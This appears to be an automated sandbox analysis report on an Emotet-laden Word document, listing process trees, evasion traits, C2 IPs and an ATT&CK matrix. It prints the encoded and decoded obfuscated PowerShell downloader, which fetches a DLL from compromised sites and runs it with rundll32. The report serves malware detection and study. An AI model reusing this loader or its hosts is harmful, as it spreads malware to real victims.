ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Suspicious powershell command line found
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B0BD push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007BCA push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006ACE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ECE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039CE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0020CE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001ACE92 push cs; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001BCE92 push cs; retf

                      Persistence and Installation Behavior:

Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bjbj\rqtl.dgq

                      Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bjbj\rqtl.dgq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Frxh\ggkviq.cnk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zgwl\aiycp.wss:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cqxs\necppp.cgm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oxpl\fwcrxow.muo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pnjy\rwrr.fge:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qaqt\yasnhb.kgm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hudb\deul.ebq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ohxf\pnwx.dib:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jpux\rkm.xqv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oxtv\rmjj.sjq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pwzo\iducd.mjn:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dbsb\hxixh.nee:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yvvm\ving.mzt:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Puve\yoqqjfh.eoi:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000007.00000002.2097021006.000000000040D000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,... (ShowWindow repeated hundreds of times; the call list is truncated in the report)
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002D76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_006A6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00396AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00206AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002876B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002D76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001B6AB2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_006C76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002476B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_002B76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_001E76B2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.187.222.40 80
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 184.66.18.83 80
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 167.71.148.58 187
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded $E3Sy = [TYPE]("{4}{3}{0}{1}{5}{2}"-f'M.Io.D','iRe','TORY','Ste','sy','C') ; SeT-ITEM VARIabLE:i7RpVz ([TYPE]("{1}{4}{2}{0}{6}{3}{7}{5}"-f 'ET.SeRVi','S','TEm.N','INT','yS','AnAgEr','CePo','M')) ;$Xsejjoo=('N'+('avc'+'lg')+'u');$Slfr1gp=$Rpb56t4 + [char](64) + $U9nybjs;$Wwuhcfs=(('U_m'+'4k')+'pq'); (gET-vARIaBle e3sY -vAlUeOn )::"CReaTEDire`c`ToRY"($HOME + (('Y'+'b'+'sR'+('g064'+'6rYbs'+'Q'+'9')+('0xm'+'rq'+'Yb')+'s') -REPlaCe ('Y'+'bs'),[cHAr]92));$K309qw1=(('Rq'+'rm')+('b2'+'8')); ( Ls variAble:i7rPvZ ).vaLUe::"SEcUri`TYpRo`TOc`ol" = (('Tls'+'1')+'2');$Nmh1wmf=(('X3b6'+'g')+'a'+'o');$Ojz_wa7 = ('M'+('8jkl'+'v4'));$Xgtwzgh=(('Cc'+'k0h')+'16');$Qqayu6h=('B'+('e6'+'f')+('r'+'w0'));$Jdgza5o=$HOME+(('{0'+'}Rg0646r'+'{'+'0}Q90'+'xmrq{'+'0}') -F [ChAR]92)+$Ojz_wa7+(('.'+'dl')+'l');$N05q5t5=('O'+('_'+'3'+'e2pf'));$Gkhm1tg=neW-Ob`j`ECT NeT.WEBClieNt;$Jkdys0o=(((('ht'+'t'+'p:J'+')(3s2)'))+('('+'J)(3s2'+')')+(('(zh'+'o'))+('ngs'+'h'+'ixingc'+'hua')+('n'+'g.')+'c'+'om'+(('J)(3s2'+')'))+'('+'wp'+('-'+'adminJ')+((')('))+(('3s'+'2)'))+(('(OTmJ'+')('+'3s'+'2)(@'))+('ht'+'t')+('p'+':J')+((')'+'(3s2'))+((')('+'J'))+((')('+'3s'))+'2'+((')('))+'w'+'w'+'w'+('.gre'+'a')+'u'+('ds'+'tu')+('d'+'io')+(('.c'+'omJ)'+'(3s'))+'2'+((')(d'+'o'+'cs'))+(('J'+')'+'(3s2)'))+(('(FGnJ'+')'+'('+'3'+'s2)(@http:J)('))+'3'+'s'+(('2)('+'J)'+'(3s'))+(('2)(k'+'o'))+'r'+('ea'+'nk'+'id')+('s'+'ed')+('u.c'+'om')+(('J)('+'3'))+'s2'+((')('+'wp-co'+'n'))+('ten'+'t')+(('J)'))+(('(3'+'s2)('))+('2c'+'Q')+(('Th
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $E3Sy = [TYPE]("{4}{3}{0}{1}{5}{2}"-f'M.Io.D','iRe','TORY','Ste','sy','C') ; SeT-ITEM VARIabLE:i7RpVz ([TYPE]("{1}{4}{2}{0}{6}{3}{7}{5}"-f 'ET.SeRVi','S','TEm.N','INT','yS','AnAgEr','CePo','M')) ;$Xsejjoo=('N'+('avc'+'lg')+'u');$Slfr1gp=$Rpb56t4 + [char](64) + $U9nybjs;$Wwuhcfs=(('U_m'+'4k')+'pq'); (gET-vARIaBle e3sY -vAlUeOn )::"CReaTEDire`c`ToRY"($HOME + (('Y'+'b'+'sR'+('g064'+'6rYbs'+'Q'+'9')+('0xm'+'rq'+'Yb')+'s') -REPlaCe ('Y'+'bs'),[cHAr]92));$K309qw1=(('Rq'+'rm')+('b2'+'8')); ( Ls variAble:i7rPvZ ).vaLUe::"SEcUri`TYpRo`TOc`ol" = (('Tls'+'1')+'2');$Nmh1wmf=(('X3b6'+'g')+'a'+'o');$Ojz_wa7 = ('M'+('8jkl'+'v4'));$Xgtwzgh=(('Cc'+'k0h')+'16');$Qqayu6h=('B'+('e6'+'f')+('r'+'w0'));$Jdgza5o=$HOME+(('{0'+'}Rg0646r'+'{'+'0}Q90'+'xmrq{'+'0}') -F [ChAR]92)+$Ojz_wa7+(('.'+'dl')+'l');$N05q5t5=('O'+('_'+'3'+'e2pf'));$Gkhm1tg=neW-Ob`j`ECT NeT.WEBClieNt;$Jkdys0o=(((('ht'+'t'+'p:J'+')(3s2)'))+('('+'J)(3s2'+')')+(('(zh'+'o'))+('ngs'+'h'+'ixingc'+'hua')+('n'+'g.')+'c'+'om'+(('J)(3s2'+')'))+'('+'wp'+('-'+'adminJ')+((')('))+(('3s'+'2)'))+(('(OTmJ'+')('+'3s'+'2)(@'))+('ht'+'t')+('p'+':J')+((')'+'(3s2'))+((')('+'J'))+((')('+'3s'))+'2'+((')('))+'w'+'w'+'w'+('.gre'+'a')+'u'+('ds'+'tu')+('d'+'io')+(('.c'+'omJ)'+'(3s'))+'2'+((')(d'+'o'+'cs'))+(('J'+')'+'(3s2)'))+(('(FGnJ'+')'+'('+'3'+'s2)(@http:J)('))+'3'+'s'+(('2)('+'J)'+'(3s'))+(('2)(k'+'o'))+'r'+('ea'+'nk'+'id')+('s'+'ed')+('u.c'+'om')+(('J)('+'3'))+'s2'+((')('+'wp-co'+'n'))+('ten'+'t')+(('J)'))+(('(3'+'s2)('))+('2c'+'Q')+(('Th
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
